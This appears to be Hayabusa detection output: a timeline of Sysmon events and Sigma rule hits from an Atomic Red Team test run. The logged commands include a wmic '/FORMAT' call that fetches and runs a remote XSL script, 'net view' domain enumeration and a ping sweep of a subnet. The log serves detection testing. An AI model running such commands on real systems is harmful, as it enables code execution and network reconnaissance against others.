+2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:56.182 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D8D0-5D31-0000-001034673300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:06.728 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5340 | PGUID: 747F3D96-D8DA-5D31-0000-0010D3833300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" | LID: 0x50951 | PID: 3220 | PGUID: 747F3D96-D8DA-5D31-0000-001029863300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,Evas | Exec,SquiblyTwo,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,Evas,XSL Script Processing,,../hayabusa-rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:06.888 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D8DA-5D31-0000-00100D8A3300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:09.823 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4856 | PGUID: 747F3D96-D8DD-5D31-0000-0010EF923300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net view /domain | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" | LID: 0x50951 | PID: 3012 | PGUID: 747F3D96-D8DD-5D31-0000-001043953300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Disc,Windows Network Enumeration,,../hayabusa-rules/sigma/process_creation/proc_creation_win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:22.314 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1988 | PGUID: 747F3D96-D8EA-5D31-0000-001030B63300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net view | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view"" | LID: 0x50951 | PID: 4684 | PGUID: 747F3D96-D8EA-5D31-0000-00108AB83300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Disc,Windows Network Enumeration,,../hayabusa-rules/sigma/process_creation/proc_creation_win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:34.797 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3344 | PGUID: 747F3D96-D8F6-5D31-0000-00100FCB3300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:35.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4528 | PGUID: 747F3D96-D8F6-5D31-0000-001091D13300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:35.038 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.1 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3876 | PGUID: 747F3D96-D8F7-5D31-0000-0010EDD33300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:35.579 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.2 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2084 | PGUID: 747F3D96-D8F7-5D31-0000-0010E3D83300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:35.988 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.3 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3068 | PGUID: 747F3D96-D8F7-5D31-0000-0010A7E13300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:36.549 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.4 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4376 | PGUID: 747F3D96-D8F8-5D31-0000-00108FE43300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:37.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.5 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3116 | PGUID: 747F3D96-D8F9-5D31-0000-00108BE73300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:37.513 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.6 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D8F9-5D31-0000-001073EA3300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:38.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.7 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1020 | PGUID: 747F3D96-D8FA-5D31-0000-00105BED3300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:38.517 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.8 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2292 | PGUID: 747F3D96-D8FA-5D31-0000-001043F03300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:39.028 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.9 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D8FB-5D31-0000-00108BF33300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:39.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.10 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5852 | PGUID: 747F3D96-D8FB-5D31-0000-001073F63300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:40.027 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.11 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2412 | PGUID: 747F3D96-D8FC-5D31-0000-001070F93300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:40.431 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.12 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D8FC-5D31-0000-00105AFC3300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:41.066 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.13 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D8FD-5D31-0000-0010650E3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:41.408 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.14 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D8FD-5D31-0000-00104F113400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:41.894 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.15 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4588 | PGUID: 747F3D96-D8FD-5D31-0000-001039143400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:42.466 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.16 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D8FE-5D31-0000-001023173400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:43.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.17 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-D8FF-5D31-0000-00100E1A3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:43.503 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.18 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D8FF-5D31-0000-0010C5203400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:44.030 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.19 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6084 | PGUID: 747F3D96-D900-5D31-0000-0010B0233400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:44.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.20 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2416 | PGUID: 747F3D96-D900-5D31-0000-00109C263400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:45.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.21 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4104 | PGUID: 747F3D96-D901-5D31-0000-001086293400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:45.501 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.22 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5112 | PGUID: 747F3D96-D901-5D31-0000-0010712C3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:46.007 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.23 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1104 | PGUID: 747F3D96-D902-5D31-0000-00105B2F3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:46.500 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.24 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4700 | PGUID: 747F3D96-D902-5D31-0000-0010B2393400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:47.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.25 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6104 | PGUID: 747F3D96-D903-5D31-0000-00109D3C3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:47.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.26 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3216 | PGUID: 747F3D96-D903-5D31-0000-0010873F3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:48.044 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.27 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1492 | PGUID: 747F3D96-D904-5D31-0000-001084423400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:48.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.28 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1316 | PGUID: 747F3D96-D904-5D31-0000-00106E453400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:49.010 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.29 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5640 | PGUID: 747F3D96-D905-5D31-0000-001058483400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:49.550 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.30 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2928 | PGUID: 747F3D96-D905-5D31-0000-0010554B3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:50.021 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.31 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1952 | PGUID: 747F3D96-D906-5D31-0000-00103F4E3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:50.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.32 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3760 | PGUID: 747F3D96-D906-5D31-0000-001029513400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
